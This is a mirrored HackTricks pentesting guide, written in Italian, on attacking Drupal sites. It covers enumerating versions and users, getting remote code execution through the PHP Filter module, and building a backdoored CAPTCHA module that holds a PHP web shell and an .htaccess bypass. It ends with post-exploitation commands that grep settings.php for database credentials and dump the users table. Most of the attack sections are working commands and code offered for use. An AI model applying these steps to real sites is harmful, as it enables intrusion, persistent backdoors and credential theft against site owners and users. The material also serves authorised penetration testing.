Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/drupal.md

8.9 KiB
Raw Blame History

Drupal

Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!

Altri modi per supportare HackTricks:

{% embed url="https://websec.nl/" %}

Discovery

  • Controlla meta
curl https://www.drupal.org/ | grep 'content="Drupal'
  • Nodo: Drupal indicizza i suoi contenuti utilizzando nodi. Un nodo può contenere qualsiasi cosa come un post di blog, un sondaggio, un articolo, ecc. Gli URI delle pagine sono di solito della forma /node/<nodeid>.
curl drupal-site.com/node/1

Enumerazione

Drupal supporta tre tipi di utenti di default:

  1. Amministratore: Questo utente ha il controllo completo sul sito web di Drupal.
  2. Utente Autenticato: Questi utenti possono accedere al sito web e svolgere operazioni come aggiungere e modificare articoli in base ai loro permessi.
  3. Anonimo: Tutti i visitatori del sito web sono designati come anonimi. Di default, a questi utenti è consentito solo leggere i post.

Versione

  • Controlla /CHANGELOG.txt
curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 ""

Drupal 7.57, 2018-02-21

{% hint style="info" %} Le installazioni più recenti di Drupal di default bloccano l'accesso ai file CHANGELOG.txt e README.txt. {% endhint %}

Enumerazione degli username

Registrazione

In /user/register prova semplicemente a creare un username e se il nome è già stato preso verrai notificato:

Richiesta di nuova password

Se richiedi una nuova password per un username esistente:

Se richiedi una nuova password per un username inesistente:

Ottenere il numero di utenti

Accedendo a /user/<number> puoi vedere il numero di utenti esistenti, in questo caso sono 2 poiché /users/3 restituisce un errore non trovato:

Pagine nascoste

Fuzz /node/$ dove $ è un numero (da 1 a 500 per esempio).
Potresti trovare pagine nascoste (test, dev) che non sono referenziate dai motori di ricerca.

Informazioni sui moduli installati

#From https://twitter.com/intigriti/status/1439192489093644292/photo/1
#Get info on installed modules
curl https://example.com/config/sync/core.extension.yml
curl https://example.com/core/core.services.yml

# Download content from files exposed in the previous step
curl https://example.com/config/sync/swiftmailer.transport.yml

Automatico

droopescan scan drupal -u http://drupal-site.local

RCE

Con il modulo Filtro PHP

{% hint style="warning" %} Nelle versioni precedenti di Drupal (prima della versione 8), era possibile accedere come amministratore e abilitare il modulo PHP filter, che "Consente di valutare codice/frammenti PHP incorporati." {% endhint %}

È necessario che il plugin php sia installato (verifica accedendo a /modules/php e se restituisce un 403 allora, esiste, se non trovato, allora il plugin php non è installato)

Vai su Moduli -> (Controlla) Filtro PHP -> Salva configurazione

Quindi clicca su Aggiungi contenuto -> Seleziona Pagina di base o Articolo -> Scrivi shellcode php nel corpo -> Seleziona Codice PHP nel Formato testo -> Seleziona Anteprima

Infine accedi al nodo appena creato:

curl http://drupal-site.local/node/3

Installa il modulo PHP Filter

Dalla versione 8 in poi, il modulo PHP Filter non è installato per impostazione predefinita. Per sfruttare questa funzionalità, dovremmo installare il modulo noi stessi.

  1. Scarica la versione più recente del modulo dal sito web di Drupal.
  2. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
  3. Una volta scaricato, vai su Amministrazione > Rapporti > Aggiornamenti disponibili.
  4. Fai clic su Sfoglia, seleziona il file dalla directory in cui lo abbiamo scaricato e poi fai clic su Installa.
  5. Una volta installato il modulo, possiamo fare clic su Contenuto e creare una nuova pagina di base, simile a quanto fatto nell'esempio di Drupal 7. Di nuovo, assicurati di selezionare Codice PHP dal menu a discesa Formato testo.

Modulo con Backdoor

Un modulo con backdoor può essere creato aggiungendo una shell a un modulo esistente. I moduli possono essere trovati sul sito drupal.org. Scegliamo un modulo come ad esempio CAPTCHA. Scorri verso il basso e copia il link per l'archivio tar.gz archivio.

  • Scarica l'archivio ed estraine i contenuti.
wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
  • Crea una shell web PHP con il contenuto:
<?php
system($_GET["cmd"]);
?>
  • Successivamente, dobbiamo creare un file .htaccess per darci accesso alla cartella. Questo è necessario poiché Drupal nega l'accesso diretto alla cartella /modules.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
  • La configurazione sopra applicherà le regole per la cartella / quando richiediamo un file in /modules. Copia entrambi questi file nella cartella captcha e crea un archivio.
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/
  • Presumendo di avere accesso amministrativo al sito web, fare clic su Gestisci e poi su Estendi nella barra laterale. Successivamente, fare clic sul pulsante + Installa nuovo modulo, e saremo portati alla pagina di installazione, come ad esempio http://drupal-site.local/admin/modules/install. Navigare all'archivio Captcha backdoor e fare clic su Installa.
  • Una volta completata l'installazione, navigare a /modules/captcha/shell.php per eseguire comandi.

Post Esploitation

Leggere settings.php

find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null

Estrarre gli utenti dal database

mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'

Riferimenti

{% embed url="https://websec.nl/" %}

Impara l'hacking su AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks: